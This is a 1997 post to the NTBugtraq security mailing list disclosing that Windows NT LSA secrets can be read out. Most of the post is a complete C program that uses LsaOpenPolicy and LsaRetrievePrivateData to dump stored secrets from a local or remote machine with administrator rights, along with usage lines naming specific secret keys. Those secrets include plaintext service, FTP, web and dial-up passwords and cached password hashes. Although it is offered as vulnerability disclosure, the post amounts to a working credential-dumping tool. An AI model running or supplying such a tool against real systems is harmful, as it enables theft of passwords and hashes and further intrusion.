NT LSA secrets

Date: Sat, 9 Aug 1997 20:06:38 +0100
From: Paul Ashton <paul@ARGO.DEMON.CO.UK>
To: NTBUGTRAQ@RC.ON.CA
Subject: LSA secrets

Following on from the service password issue I raised some time ago,
here's a little program that will dump various LSA secrets such
as service passwords (plain text), cached password hashes of the
last users to login to a machine, FTP, WEB, etc. plaintext
passwords, RAS dial up account names, passwords etc, workstation
passwords for domain access, etc.

run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
or any other registry key under NTLM\security\policy\secrets.

The moral? If only microsoft would document just 10% of the
APIs, maybe people wouldn't make an issue of these things.

NOTE: THIS HAS TO BE RUN AS AN ADMINISTRATOR, OK?!

Cheers
Paul
ps. Sorry about the coding, but win32 programming is so tedious.

#include <windows.h>
#include <stdio.h>

#include "ntsecapi.h"
#define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
void write();

PLSA_UNICODE_STRING
str(LPWSTR x)
{
    static LSA_UNICODE_STRING s;

    s.Buffer=x;
    s.Length=wcslen(x)*sizeof(WCHAR);
    s.MaximumLength = (wcslen(x)+1)*2;
    return &s;
}

int _cdecl
main(int argc, char *argv[])
{
    LSA_HANDLE pol;
    PLSA_UNICODE_STRING foo;
    LSA_OBJECT_ATTRIBUTES attrs;
    WCHAR keyname[256]=L"";
    WCHAR host[256]=L"";

    wsprintfW(keyname, L"%hS", argv[1]);
    if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
    memset(&attrs, 0, sizeof(attrs));
    AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
    AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
    write(1, foo->Buffer, foo->Length);
    LsaClose(pol);
    exit(0);
}